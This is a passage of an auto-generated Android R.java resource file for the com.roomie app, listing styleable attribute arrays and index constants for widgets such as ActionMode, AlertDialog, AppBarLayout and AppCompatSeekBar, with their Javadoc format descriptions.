description Specifies a background for the action mode bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:background */ public static final int ActionMode_background = 3; /** <p> @attr description Specifies a background for the split action mode bar. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This is a private symbol. @attr name com.roomie:backgroundSplit */ public static final int ActionMode_backgroundSplit = 4; /** <p> @attr description Specifies a layout to use for the "close" item at the starting edge. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:closeItemLayout */ public static final int ActionMode_closeItemLayout = 5; /** <p> @attr description Specifies a fixed height for the action mode bar. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:height */ public static final int ActionMode_height = 0; /** <p> @attr description Specifies a style to use for subtitle text. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:subtitleTextStyle */ public static final int ActionMode_subtitleTextStyle = 2; /** <p> @attr description Specifies a style to use for title text. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:titleTextStyle */ public static final int ActionMode_titleTextStyle = 1; /** Attributes that can be used with a ActivityChooserView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ActivityChooserView_expandActivityOverflowButtonDrawable com.roomie:expandActivityOverflowButtonDrawable}</code></td><td> The drawable to show in the button for expanding the activities overflow popup.</td></tr> <tr><td><code>{@link #ActivityChooserView_initialActivityCount com.roomie:initialActivityCount}</code></td><td> The maximal number of items initially shown in the activity list.</td></tr> </table> @see #ActivityChooserView_expandActivityOverflowButtonDrawable @see #ActivityChooserView_initialActivityCount */ public static final int[] ActivityChooserView = { 0x7f010048, 0x7f010049 }; /** <p> @attr description The drawable to show in the button for expanding the activities overflow popup. <strong>Note:</strong> Clients would like to set this drawable as a clue about the action the chosen activity will perform. For example, if share activity is to be chosen the drawable should give a clue that sharing is to be performed. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:expandActivityOverflowButtonDrawable */ public static final int ActivityChooserView_expandActivityOverflowButtonDrawable = 1; /** <p> @attr description The maximal number of items initially shown in the activity list. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:initialActivityCount */ public static final int ActivityChooserView_initialActivityCount = 0; /** Attributes that can be used with a AlertDialog. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #AlertDialog_android_layout android:layout}</code></td><td></td></tr> <tr><td><code>{@link #AlertDialog_buttonIconDimen com.roomie:buttonIconDimen}</code></td><td></td></tr> <tr><td><code>{@link #AlertDialog_buttonPanelSideLayout com.roomie:buttonPanelSideLayout}</code></td><td></td></tr> <tr><td><code>{@link #AlertDialog_listItemLayout com.roomie:listItemLayout}</code></td><td></td></tr> <tr><td><code>{@link #AlertDialog_listLayout com.roomie:listLayout}</code></td><td></td></tr> <tr><td><code>{@link #AlertDialog_multiChoiceItemLayout com.roomie:multiChoiceItemLayout}</code></td><td></td></tr> <tr><td><code>{@link #AlertDialog_showTitle com.roomie:showTitle}</code></td><td></td></tr> <tr><td><code>{@link #AlertDialog_singleChoiceItemLayout com.roomie:singleChoiceItemLayout}</code></td><td></td></tr> </table> @see #AlertDialog_android_layout @see #AlertDialog_buttonIconDimen @see #AlertDialog_buttonPanelSideLayout @see #AlertDialog_listItemLayout @see #AlertDialog_listLayout @see #AlertDialog_multiChoiceItemLayout @see #AlertDialog_showTitle @see #AlertDialog_singleChoiceItemLayout */ public static final int[] AlertDialog = { 0x010100f2, 0x7f01004a, 0x7f01004b, 0x7f01004c, 0x7f01004d, 0x7f01004e, 0x7f01004f, 0x7f010050 }; /** <p>This symbol is the offset where the {@link android.R.attr#layout} attribute's value can be found in the {@link #AlertDialog} array. @attr name android:layout */ public static final int AlertDialog_android_layout = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#buttonIconDimen} attribute's value can be found in the {@link #AlertDialog} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:buttonIconDimen */ public static final int AlertDialog_buttonIconDimen = 7; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#buttonPanelSideLayout} attribute's value can be found in the {@link #AlertDialog} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:buttonPanelSideLayout */ public static final int AlertDialog_buttonPanelSideLayout = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#listItemLayout} attribute's value can be found in the {@link #AlertDialog} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:listItemLayout */ public static final int AlertDialog_listItemLayout = 5; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#listLayout} attribute's value can be found in the {@link #AlertDialog} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:listLayout */ public static final int AlertDialog_listLayout = 2; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#multiChoiceItemLayout} attribute's value can be found in the {@link #AlertDialog} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:multiChoiceItemLayout */ public static final int AlertDialog_multiChoiceItemLayout = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#showTitle} attribute's value can be found in the {@link #AlertDialog} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:showTitle */ public static final int AlertDialog_showTitle = 6; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#singleChoiceItemLayout} attribute's value can be found in the {@link #AlertDialog} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:singleChoiceItemLayout */ public static final int AlertDialog_singleChoiceItemLayout = 4; /** Indicates if the drawable needs to be mirrored when its layout direction is RTL (right-to-left). <attr name="autoMirrored"/> <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #AnimatedStateListDrawableCompat_android_constantSize android:constantSize}</code></td><td> If true, the drawable's reported internal size will remain constant as the state changes; the size is the maximum of all of the states.</td></tr> <tr><td><code>{@link #AnimatedStateListDrawableCompat_android_dither android:dither}</code></td><td> Enables or disables dithering of the bitmap if the bitmap does not have the same pixel configuration as the screen (for instance: a ARGB 8888 bitmap with an RGB 565 screen).</td></tr> <tr><td><code>{@link #AnimatedStateListDrawableCompat_android_enterFadeDuration android:enterFadeDuration}</code></td><td> Amount of time (in milliseconds) to fade in a new state drawable.</td></tr> <tr><td><code>{@link #AnimatedStateListDrawableCompat_android_exitFadeDuration android:exitFadeDuration}</code></td><td> Amount of time (in milliseconds) to fade out an old state drawable.</td></tr> <tr><td><code>{@link #AnimatedStateListDrawableCompat_android_variablePadding android:variablePadding}</code></td><td> If true, allows the drawable's padding to change based on the current state that is selected.</td></tr> <tr><td><code>{@link #AnimatedStateListDrawableCompat_android_visible android:visible}</code></td><td> Indicates whether the drawable should be initially visible.</td></tr> </table> @see #AnimatedStateListDrawableCompat_android_constantSize @see #AnimatedStateListDrawableCompat_android_dither @see #AnimatedStateListDrawableCompat_android_enterFadeDuration @see #AnimatedStateListDrawableCompat_android_exitFadeDuration @see #AnimatedStateListDrawableCompat_android_variablePadding @see #AnimatedStateListDrawableCompat_android_visible */ public static final int[] AnimatedStateListDrawableCompat = { 0x0101011c, 0x01010194, 0x01010195, 0x01010196, 0x0101030c, 0x0101030d }; /** <p> @attr description If true, the drawable's reported internal size will remain constant as the state changes; the size is the maximum of all of the states. If false, the size will vary based on the current state. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#constantSize}. @attr name android:constantSize */ public static final int AnimatedStateListDrawableCompat_android_constantSize = 3; /** <p> @attr description Enables or disables dithering of the bitmap if the bitmap does not have the same pixel configuration as the screen (for instance: a ARGB 8888 bitmap with an RGB 565 screen). <p>This corresponds to the global attribute resource symbol {@link android.R.attr#dither}. @attr name android:dither */ public static final int AnimatedStateListDrawableCompat_android_dither = 0; /** <p> @attr description Amount of time (in milliseconds) to fade in a new state drawable. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#enterFadeDuration}. @attr name android:enterFadeDuration */ public static final int AnimatedStateListDrawableCompat_android_enterFadeDuration = 4; /** <p> @attr description Amount of time (in milliseconds) to fade out an old state drawable. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#exitFadeDuration}. @attr name android:exitFadeDuration */ public static final int AnimatedStateListDrawableCompat_android_exitFadeDuration = 5; /** <p> @attr description If true, allows the drawable's padding to change based on the current state that is selected. If false, the padding will stay the same (based on the maximum padding of all the states). Enabling this feature requires that the owner of the drawable deal with performing layout when the state changes, which is often not supported. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#variablePadding}. @attr name android:variablePadding */ public static final int AnimatedStateListDrawableCompat_android_variablePadding = 2; /** <p> @attr description Indicates whether the drawable should be initially visible. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#visible}. @attr name android:visible */ public static final int AnimatedStateListDrawableCompat_android_visible = 1; /** Attributes that can be used with a AnimatedStateListDrawableItem. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #AnimatedStateListDrawableItem_android_drawable android:drawable}</code></td><td> Reference to a drawable resource to use for the frame.</td></tr> <tr><td><code>{@link #AnimatedStateListDrawableItem_android_id android:id}</code></td><td> Keyframe identifier for use in specifying transitions.</td></tr> </table> @see #AnimatedStateListDrawableItem_android_drawable @see #AnimatedStateListDrawableItem_android_id */ public static final int[] AnimatedStateListDrawableItem = { 0x010100d0, 0x01010199 }; /** <p> @attr description Reference to a drawable resource to use for the frame. If not given, the drawable must be defined by the first child tag. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#drawable}. @attr name android:drawable */ public static final int AnimatedStateListDrawableItem_android_drawable = 1; /** <p> @attr description Keyframe identifier for use in specifying transitions. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#id}. @attr name android:id */ public static final int AnimatedStateListDrawableItem_android_id = 0; /** Attributes that can be used with a AnimatedStateListDrawableTransition. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #AnimatedStateListDrawableTransition_android_drawable android:drawable}</code></td><td> Reference to a animation drawable resource to use for the frame.</td></tr> <tr><td><code>{@link #AnimatedStateListDrawableTransition_android_fromId android:fromId}</code></td><td> Keyframe identifier for the starting state.</td></tr> <tr><td><code>{@link #AnimatedStateListDrawableTransition_android_reversible android:reversible}</code></td><td> Whether this transition is reversible.</td></tr> <tr><td><code>{@link #AnimatedStateListDrawableTransition_android_toId android:toId}</code></td><td> Keyframe identifier for the ending state.</td></tr> </table> @see #AnimatedStateListDrawableTransition_android_drawable @see #AnimatedStateListDrawableTransition_android_fromId @see #AnimatedStateListDrawableTransition_android_reversible @see #AnimatedStateListDrawableTransition_android_toId */ public static final int[] AnimatedStateListDrawableTransition = { 0x01010199, 0x01010449, 0x0101044a, 0x0101044b }; /** <p> @attr description Reference to a animation drawable resource to use for the frame. If not given, the animation drawable must be defined by the first child tag. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#drawable}. @attr name android:drawable */ public static final int AnimatedStateListDrawableTransition_android_drawable = 0; /** <p> @attr description Keyframe identifier for the starting state. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#fromId}. @attr name android:fromId */ public static final int AnimatedStateListDrawableTransition_android_fromId = 2; /** <p> @attr description Whether this transition is reversible. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#reversible}. @attr name android:reversible */ public static final int AnimatedStateListDrawableTransition_android_reversible = 3; /** <p> @attr description Keyframe identifier for the ending state. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#toId}. @attr name android:toId */ public static final int AnimatedStateListDrawableTransition_android_toId = 1; /** Attributes that can be used with a AppBarLayout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #AppBarLayout_android_background android:background}</code></td><td></td></tr> <tr><td><code>{@link #AppBarLayout_android_keyboardNavigationCluster android:keyboardNavigationCluster}</code></td><td></td></tr> <tr><td><code>{@link #AppBarLayout_android_touchscreenBlocksFocus android:touchscreenBlocksFocus}</code></td><td></td></tr> <tr><td><code>{@link #AppBarLayout_elevation com.roomie:elevation}</code></td><td> Elevation for the action bar itself </td></tr> <tr><td><code>{@link #AppBarLayout_expanded com.roomie:expanded}</code></td><td></td></tr> <tr><td><code>{@link #AppBarLayout_liftOnScroll com.roomie:liftOnScroll}</code></td><td></td></tr> </table> @see #AppBarLayout_android_background @see #AppBarLayout_android_keyboardNavigationCluster @see #AppBarLayout_android_touchscreenBlocksFocus @see #AppBarLayout_elevation @see #AppBarLayout_expanded @see #AppBarLayout_liftOnScroll */ public static final int[] AppBarLayout = { 0x010100d4, 0x0101048f, 0x01010540, 0x7f010045, 0x7f010145, 0x7f010146 }; /** <p>This symbol is the offset where the {@link android.R.attr#background} attribute's value can be found in the {@link #AppBarLayout} array. @attr name android:background */ public static final int AppBarLayout_android_background = 0; /** <p>This symbol is the offset where the {@link android.R.attr#keyboardNavigationCluster} attribute's value can be found in the {@link #AppBarLayout} array. @attr name android:keyboardNavigationCluster */ public static final int AppBarLayout_android_keyboardNavigationCluster = 2; /** <p>This symbol is the offset where the {@link android.R.attr#touchscreenBlocksFocus} attribute's value can be found in the {@link #AppBarLayout} array. @attr name android:touchscreenBlocksFocus */ public static final int AppBarLayout_android_touchscreenBlocksFocus = 1; /** <p> @attr description Elevation for the action bar itself <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:elevation */ public static final int AppBarLayout_elevation = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#expanded} attribute's value can be found in the {@link #AppBarLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:expanded */ public static final int AppBarLayout_expanded = 4; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#liftOnScroll} attribute's value can be found in the {@link #AppBarLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:liftOnScroll */ public static final int AppBarLayout_liftOnScroll = 5; /** Attributes that can be used with a AppBarLayoutStates. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #AppBarLayoutStates_state_collapsed com.roomie:state_collapsed}</code></td><td></td></tr> <tr><td><code>{@link #AppBarLayoutStates_state_collapsible com.roomie:state_collapsible}</code></td><td></td></tr> <tr><td><code>{@link #AppBarLayoutStates_state_liftable com.roomie:state_liftable}</code></td><td></td></tr> <tr><td><code>{@link #AppBarLayoutStates_state_lifted com.roomie:state_lifted}</code></td><td></td></tr> </table> @see #AppBarLayoutStates_state_collapsed @see #AppBarLayoutStates_state_collapsible @see #AppBarLayoutStates_state_liftable @see #AppBarLayoutStates_state_lifted */ public static final int[] AppBarLayoutStates = { 0x7f010147, 0x7f010148, 0x7f010149, 0x7f01014a }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#state_collapsed} attribute's value can be found in the {@link #AppBarLayoutStates} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:state_collapsed */ public static final int AppBarLayoutStates_state_collapsed = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#state_collapsible} attribute's value can be found in the {@link #AppBarLayoutStates} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:state_collapsible */ public static final int AppBarLayoutStates_state_collapsible = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#state_liftable} attribute's value can be found in the {@link #AppBarLayoutStates} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:state_liftable */ public static final int AppBarLayoutStates_state_liftable = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#state_lifted} attribute's value can be found in the {@link #AppBarLayoutStates} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:state_lifted */ public static final int AppBarLayoutStates_state_lifted = 2; /** Attributes that can be used with a AppBarLayout_Layout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #AppBarLayout_Layout_layout_scrollFlags com.roomie:layout_scrollFlags}</code></td><td></td></tr> <tr><td><code>{@link #AppBarLayout_Layout_layout_scrollInterpolator com.roomie:layout_scrollInterpolator}</code></td><td></td></tr> </table> @see #AppBarLayout_Layout_layout_scrollFlags @see #AppBarLayout_Layout_layout_scrollInterpolator */ public static final int[] AppBarLayout_Layout = { 0x7f01014b, 0x7f01014c }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#layout_scrollFlags} attribute's value can be found in the {@link #AppBarLayout_Layout} array. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>scroll</code></td><td>0x1</td><td></td></tr> <tr><td><code>exitUntilCollapsed</code></td><td>0x2</td><td></td></tr> <tr><td><code>enterAlways</code></td><td>0x4</td><td></td></tr> <tr><td><code>enterAlwaysCollapsed</code></td><td>0x8</td><td></td></tr> <tr><td><code>snap</code></td><td>0x10</td><td></td></tr> <tr><td><code>snapMargins</code></td><td>0x20</td><td></td></tr> </table> @attr name com.roomie:layout_scrollFlags */ public static final int AppBarLayout_Layout_layout_scrollFlags = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#layout_scrollInterpolator} attribute's value can be found in the {@link #AppBarLayout_Layout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:layout_scrollInterpolator */ public static final int AppBarLayout_Layout_layout_scrollInterpolator = 1; /** Attributes that can be used with a AppCompatImageView. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #AppCompatImageView_android_src android:src}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatImageView_srcCompat com.roomie:srcCompat}</code></td><td> Sets a drawable as the content of this ImageView.</td></tr> <tr><td><code>{@link #AppCompatImageView_tint com.roomie:tint}</code></td><td> Tint to apply to the image source.</td></tr> <tr><td><code>{@link #AppCompatImageView_tintMode com.roomie:tintMode}</code></td><td> Blending mode used to apply the image source tint.</td></tr> </table> @see #AppCompatImageView_android_src @see #AppCompatImageView_srcCompat @see #AppCompatImageView_tint @see #AppCompatImageView_tintMode */ public static final int[] AppCompatImageView = { 0x01010119, 0x7f010051, 0x7f010052, 0x7f010053 }; /** <p>This symbol is the offset where the {@link android.R.attr#src} attribute's value can be found in the {@link #AppCompatImageView} array. @attr name android:src */ public static final int AppCompatImageView_android_src = 0; /** <p> @attr description Sets a drawable as the content of this ImageView. Allows the use of vector drawable when running on older versions of the platform. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:srcCompat */ public static final int AppCompatImageView_srcCompat = 1; /** <p> @attr description Tint to apply to the image source. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:tint */ public static final int AppCompatImageView_tint = 2; /** <p> @attr description Blending mode used to apply the image source tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and icon color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:tintMode */ public static final int AppCompatImageView_tintMode = 3; /** Attributes that can be used with a AppCompatSeekBar. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #AppCompatSeekBar_android_thumb android:thumb}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatSeekBar_tickMark com.roomie:tickMark}</code></td><td> Drawable displayed at each progress position on a seekbar.</td></tr> <tr><td><code>{@link #AppCompatSeekBar_tickMarkTint com.roomie:tickMarkTint}</code></td><td> Tint to apply to the tick mark drawable.</td></tr> <tr><td><code>{@link #AppCompatSeekBar_tickMarkTintMode com.roomie:tickMarkTintMode}</code></td><td> Blending mode used to apply the tick mark tint.</td></tr> </table> @see #AppCompatSeekBar_android_thumb @see #AppCompatSeekBar_tickMark @see #AppCompatSeekBar_tickMarkTint @see #AppCompatSeekBar_tickMarkTintMode */ public static final int[] AppCompatSeekBar = { 0x01010142, 0x7f010054, 0x7f010055, 0x7f010056 }; /** <p>This symbol is the offset where the {@link android.R.attr#thumb} attribute's value can be found in the {@link #AppCompatSeekBar} array. @attr name android:thumb */ public static final int AppCompatSeekBar_android_thumb = 0; /** <p> @attr description Drawable displayed at each progress position on a seekbar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:tickMark */ public static final int AppCompatSeekBar_tickMark = 1; /** <p> @attr description Tint to apply to the tick mark drawable. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:tickMarkTint */ public static final int AppCompatSeekBar_tickMarkTint = 2; /** <p> @attr description Blending mode used to apply the tick mark tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and drawable color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:tickMarkTintMode */ public static final int AppCompatSeekBar_tickMarkTintMode = 3; /** Attributes that can be used with a AppCompatTextHelper. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #AppCompatTextHelper_android_drawableBottom android:drawableBottom}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTextHelper_android_drawableEnd android:drawableEnd}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTextHelper_android_drawableLeft android:drawableLeft}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTextHelper_android_drawableRight android:drawableRight}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTextHelper_android_drawableStart android:drawableStart}</code></td><td></td></tr> <tr><td><code>{@link #AppCompatTextHelper_android_drawableTop 